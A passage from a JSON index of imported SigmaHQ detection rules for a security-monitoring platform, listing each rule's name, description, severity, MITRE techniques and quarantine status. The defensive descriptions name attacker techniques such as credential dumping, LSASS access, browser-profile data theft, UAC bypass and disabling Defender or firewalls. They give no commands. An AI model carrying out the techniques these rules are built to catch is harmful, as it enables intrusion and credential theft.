"sigmahq-sigma-480e7e51-e797-47e3-8d72-ebfce65b6d8d", "type": "detection", "name": "Python Spawning Pretty TTY on Windows", "description": "Detects python spawning a pretty tty", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/python-spawning-pretty-tty-on-windows.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "480e7e51-e797-47e3-8d72-ebfce65b6d8d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_python_pty_spawn.yml" } }, { "id": "sigmahq-sigma-4833155a-4053-4c9c-a997-777fcea0baa7", "type": "detection", "name": "SQLite Firefox Profile Data DB Access", "description": "Detect usage of the \"sqlite\" binary to query databases in Firefox and other Gecko-based browsers for potential data stealing.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1539", "T1005" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/sqlite-firefox-profile-data-db-access.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4833155a-4053-4c9c-a997-777fcea0baa7", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_sqlite_firefox_gecko_profile_data.yml" } }, { "id": "sigmahq-sigma-48437c39-9e5f-47fb-af95-3d663c3f2919", "type": "detection", "name": "UAC Disabled", "description": "Detects when an attacker tries to disable User Account Control (UAC) by setting the registry value \"EnableLUA\" to 0.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1548.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": true, "path": "detections/sigma-imports/endpoint/uac-disabled.yaml", "provenance": { "source": "SigmaHQ/sigma", "source_id": "48437c39-9e5f-47fb-af95-3d663c3f2919", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_uac_disable.yml" } }, { "id": "sigmahq-sigma-48739819-8230-4ee3-a8ea-e0289d1fb0ff", "type": "detection", "name": "Azure Active Directory Hybrid Health AD FS Service Delete", "description": "This detection uses azureactivity logs (Administrative category) to identify the deletion of an Azure AD Hybrid health AD FS service instance in a tenant.\nA threat actor can create a new AD Health ADFS service and create a fake server to spoof AD FS signing logs.\nThe health AD FS service can then be deleted after it is not longer needed via HTTP requests to Azure.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1578.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/azure-active-directory-hybrid-health-ad-fs-service-delete.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "48739819-8230-4ee3-a8ea-e0289d1fb0ff", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/activity_logs/azure_aadhybridhealth_adfs_service_delete.yml" } }, { "id": "sigmahq-sigma-487bb375-12ef-41f6-baae-c6a1572b4dd1", "type": "detection", "name": "Potential Persistence Via Outlook Today Page", "description": "Detects potential persistence activity via outlook today page.\nAn attacker can set a custom page to execute arbitrary code and link to it via the registry values \"URL\" and \"UserDefinedUrl\".", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-persistence-via-outlook-today-page.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "487bb375-12ef-41f6-baae-c6a1572b4dd1", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_persistence_outlook_todaypage.yml" } }, { "id": "sigmahq-sigma-487c7524-f892-4054-b263-8a0ace63fc25", "type": "detection", "name": "Invoke-Obfuscation Via Stdin - System", "description": "Detects Obfuscated Powershell via Stdin in Scripts", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1027", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/invoke-obfuscation-via-stdin-system.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "487c7524-f892-4054-b263-8a0ace63fc25", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/system/service_control_manager/win_system_invoke_obfuscation_via_stdin_services.yml" } }, { "id": "sigmahq-sigma-488b44e7-3781-4a71-888d-c95abfacf44d", "type": "detection", "name": "Windows Firewall Profile Disabled", "description": "Detects when a user disables the Windows Firewall via a Profile to help evade defense.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1686.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/windows-firewall-profile-disabled.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "488b44e7-3781-4a71-888d-c95abfacf44d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_windows_firewall_profile_disabled.yml" } }, { "id": "sigmahq-sigma-48917adc-a28e-4f5d-b729-11e75da8941f", "type": "detection", "name": "Suspicious Windows Defender Folder Exclusion Added Via Reg.EXE", "description": "Detects the usage of \"reg.exe\" to add Defender folder exclusions. Qbot has been seen using this technique to add exclusions for folders within AppData and ProgramData.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-windows-defender-folder-exclusion-added-via-reg-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "48917adc-a28e-4f5d-b729-11e75da8941f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_reg_defender_exclusion.yml" } }, { "id": "sigmahq-sigma-48a45d45-8112-416b-8a67-46e03a4b2107", "type": "detection", "name": "Remove Account From Domain Admin Group", "description": "Adversaries may interrupt availability of system and network resources by inhibiting access to accounts utilized by legitimate users.\nAccounts may be deleted, locked, or manipulated (ex: changed credentials) to remove access to accounts.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1531" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/remove-account-from-domain-admin-group.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "48a45d45-8112-416b-8a67-46e03a4b2107", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_susp_remove_adgroupmember.yml" } }, { "id": "sigmahq-sigma-48a61b29-389f-4032-b317-b30de6b95314", "type": "detection", "name": "Suspicious Plink Port Forwarding", "description": "Detects suspicious Plink tunnel port forwarding to a local port", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1572", "T1021.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-plink-port-forwarding.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "48a61b29-389f-4032-b317-b30de6b95314", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_plink_port_forwarding.yml" } }, { "id": "sigmahq-sigma-48bbc537-b652-4b4e-bd1d-281172df448f", "type": "detection", "name": "Sysinternals PsSuspend Execution", "description": "Detects usage of Sysinternals PsSuspend which can be abused to suspend critical processes", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1543.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/sysinternals-pssuspend-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "48bbc537-b652-4b4e-bd1d-281172df448f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_sysinternals_pssuspend_execution.yml" } }, { "id": "sigmahq-sigma-48bfd177-7cf2-412b-ad77-baf923489e82", "type": "detection", "name": "Potentially Suspicious Volume Shadow Copy Vsstrace.dll Load", "description": "Detects the image load of VSS DLL by uncommon executables", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1490" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potentially-suspicious-volume-shadow-copy-vsstrace-dll-load.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "48bfd177-7cf2-412b-ad77-baf923489e82", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_dll_vsstrace_susp_load.yml" } }, { "id": "sigmahq-sigma-48d91a3a-2363-43ba-a456-ca71ac3da5c2", "type": "detection", "name": "Audit CVE Event", "description": "Detects events generated by user-mode applications when they call the CveEventWrite API when a known vulnerability is trying to be exploited.\nMS started using this log in Jan. 2020 with CVE-2020-0601 (a Windows CryptoAPI vulnerability.\nUnfortunately, that is about the only instance of CVEs being written to this log.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "critical", "category": "_quarantine", "mitre_techniques": [ "T1203", "T1068", "T1211", "T1212", "T1210", "T1499.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/audit-cve-event.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "48d91a3a-2363-43ba-a456-ca71ac3da5c2", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/application/microsoft-windows_audit_cve/win_audit_cve.yml" } }, { "id": "sigmahq-sigma-48ea844d-19b1-4642-944e-fe39c2cc1fec", "type": "detection", "name": "UAC Bypass Using IDiagnostic Profile - File", "description": "Detects the creation of a file by \"dllhost.exe\" in System32 directory part of \"IDiagnosticProfileUAC\" UAC bypass technique", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1548.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/uac-bypass-using-idiagnostic-profile-file.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "48ea844d-19b1-4642-944e-fe39c2cc1fec", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_uac_bypass_idiagnostic_profile.yml" } }, { "id": "sigmahq-sigma-4916a35e-bfc4-47d0-8e25-a003d7067061", "type": "detection", "name": "Sysmon Driver Altitude Change", "description": "Detects changes in Sysmon driver altitude value.\nIf the Sysmon driver is configured to load at an altitude of another registered service, it will fail to load at boot.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/sysmon-driver-altitude-change.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4916a35e-bfc4-47d0-8e25-a003d7067061", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_change_sysmon_driver_altitude.yml" } }, { "id": "sigmahq-sigma-4922a5dd-6743-4fc2-8e81-144374280997", "type": "detection", "name": "Flash Player Update from Suspicious Location", "description": "Detects a flashplayer update from an unofficial location", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1189", "T1204.002", "T1036.005" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/flash-player-update-from-suspicious-location.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4922a5dd-6743-4fc2-8e81-144374280997", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/web/proxy_generic/proxy_susp_flash_download_loc.yml" } }, { "id": "sigmahq-sigma-4931188c-178e-4ee7-a348-39e8a7a56821", "type": "detection", "name": "Filter Driver Unloaded Via Fltmc.EXE", "description": "Detect filter driver unloading activity via fltmc.exe", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1070", "T1685", "T1685.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/filter-driver-unloaded-via-fltmc-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4931188c-178e-4ee7-a348-39e8a7a56821", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_fltmc_unload_driver.yml" } }, { "id": "sigmahq-sigma-49329257-089d-46e6-af37-4afce4290685", "type": "detection", "name": "HackTool - SharpEvtMute DLL Load", "description": "Detects the load of EvtMuteHook.dll, a key component of SharpEvtHook, a tool that tampers with the Windows event logs", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-sharpevtmute-dll-load.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "49329257-089d-46e6-af37-4afce4290685", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_hktl_sharpevtmute.yml" } }, { "id": "sigmahq-sigma-493fb4ab-cdcc-4c4f-818c-0e363bd1e4bb", "type": "detection", "name": "WMI Event Consumer Created Named Pipe", "description": "Detects the WMI Event Consumer service scrcons.exe creating a named pipe", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1047" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/wmi-event-consumer-created-named-pipe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "493fb4ab-cdcc-4c4f-818c-0e363bd1e4bb", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/pipe_created/pipe_created_scrcons_wmi_consumer_namedpipe.yml" } }, { "id": "sigmahq-sigma-496a0e47-0a33-4dca-b009-9e6ca3591f39", "type": "detection", "name": "Suspicious Kerberos RC4 Ticket Encryption", "description": "Detects service ticket requests using RC4 encryption type", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1558.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-kerberos-rc4-ticket-encryption.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "496a0e47-0a33-4dca-b009-9e6ca3591f39", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_susp_rc4_kerberos.yml" } }, { "id": "sigmahq-sigma-4976aa50-8f41-45c6-8b15-ab3fc10e79ed", "type": "detection", "name": "Credential Dumping Tools Service Execution - System", "description": "Detects well-known credential dumping tools execution via service execution events", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1003.001", "T1003.002", "T1003.004", "T1003.005", "T1003.006", "T1569.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/credential-dumping-tools-service-execution-system.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4976aa50-8f41-45c6-8b15-ab3fc10e79ed", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/system/service_control_manager/win_system_mal_creddumper.yml" } }, { "id": "sigmahq-sigma-4990c2e3-f4b8-45e3-bc3c-30b14ff0ed26", "type": "detection", "name": "AWS Glue Development Endpoint Activity", "description": "Detects possible suspicious glue development endpoint activity.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/aws-glue-development-endpoint-activity.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4990c2e3-f4b8-45e3-bc3c-30b14ff0ed26", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/aws/cloudtrail/aws_passed_role_to_glue_development_endpoint.yml" } }, { "id": "sigmahq-sigma-49a268a4-72f4-4e38-8a7b-885be690c5b5", "type": "detection", "name": "User Added To Privilege Role", "description": "Detects when a user is added to a privileged role.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1078.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/user-added-to-privilege-role.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "49a268a4-72f4-4e38-8a7b-885be690c5b5", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/audit_logs/azure_priviledged_role_assignment_add.yml" } }, { "id": "sigmahq-sigma-49aae26c-450e-448b-911d-b3c13d178dfc", "type": "detection", "name": "Linux Keylogging with Pam.d", "description": "Detect attempt to enable auditing of TTY input", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1003", "T1056.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/linux-keylogging-with-pam-d.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "49aae26c-450e-448b-911d-b3c13d178dfc", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/auditd/lnx_auditd_keylogging_with_pam_d.yml" } }, { "id": "sigmahq-sigma-49be8799-7b4d-4fda-ad23-cafbefdebbc5", "type": "detection", "name": "Use of Wfc.exe", "description": "The Workflow Command-line Compiler can be used for AWL bypass and is listed in Microsoft's recommended block rules.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1127" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/use-of-wfc-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "49be8799-7b4d-4fda-ad23-cafbefdebbc5", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_lolbin_wfc.yml" } }, { "id": "sigmahq-sigma-49d9671b-0a0a-4c09-8280-d215bfd30662", "type": "detection", "name": "Application Terminated Via Wmic.EXE", "description": "Detects calls to the \"terminate\" function via wmic in order to kill an application", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1047" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/application-terminated-via-wmic-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "49d9671b-0a0a-4c09-8280-d215bfd30662", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_wmic_terminate_application.yml" } }, { "id": "sigmahq-sigma-49e5bc24-8b86-49f1-b743-535f332c2856", "type": "detection", "name": "Microsoft Defender Tamper Protection Trigger", "description": "Detects blocked attempts to change any of Defender's settings such as \"Real Time Monitoring\" and \"Behavior Monitoring\"", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": true, "path": "detections/sigma-imports/endpoint/microsoft-defender-tamper-protection-trigger.yaml", "provenance": { "source": "SigmaHQ/sigma", "source_id": "49e5bc24-8b86-49f1-b743-535f332c2856", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/windefend/win_defender_tamper_protection_trigger.yml" } }, { "id": "sigmahq-sigma-49f2f17b-b4c8-4172-a68b-d5bf95d05130", "type": "detection", "name": "UAC Bypass via ICMLuaUtil", "description": "Detects the pattern of UAC Bypass using ICMLuaUtil Elevated COM interface", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1548.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/uac-bypass-via-icmluautil.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "49f2f17b-b4c8-4172-a68b-d5bf95d05130", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_uac_bypass_icmluautil.yml" } }, { "id": "sigmahq-sigma-49f5dfc1-f92e-4d34-96fa-feba3f6acf36", "type": "detection", "name": "Disabling Security Tools - Builtin", "description": "Detects disabling security tools", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1686" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/disabling-security-tools-builtin.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "49f5dfc1-f92e-4d34-96fa-feba3f6acf36", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/builtin/syslog/lnx_syslog_security_tools_disabling_syslog.yml" } }, { "id": "sigmahq-sigma-4a0b2c7e-7cb2-495d-8b63-5f268e7bfd67", "type": "detection", "name": "Renamed ProcDump Execution", "description": "Detects the execution of a renamed ProcDump executable.\nThis often done by attackers or malware in order to evade defensive mechanisms.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1036.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/renamed-procdump-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4a0b2c7e-7cb2-495d-8b63-5f268e7bfd67", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_renamed_sysinternals_procdump.yml" } }, { "id": "sigmahq-sigma-4a1b6da0-d94f-4fc3-98fc-2d9cb9e5ee76", "type": "detection", "name": "Potentially Suspicious AccessMask Requested From LSASS", "description": "Detects process handle on LSASS process with certain access mask", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1003.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potentially-suspicious-accessmask-requested-from-lsass.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4a1b6da0-d94f-4fc3-98fc-2d9cb9e5ee76", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_susp_lsass_dump_generic.yml" } }, { "id": "sigmahq-sigma-4a241dea-235b-4a7e-8d76-50d817b146c4", "type": "detection", "name": "Suspicious 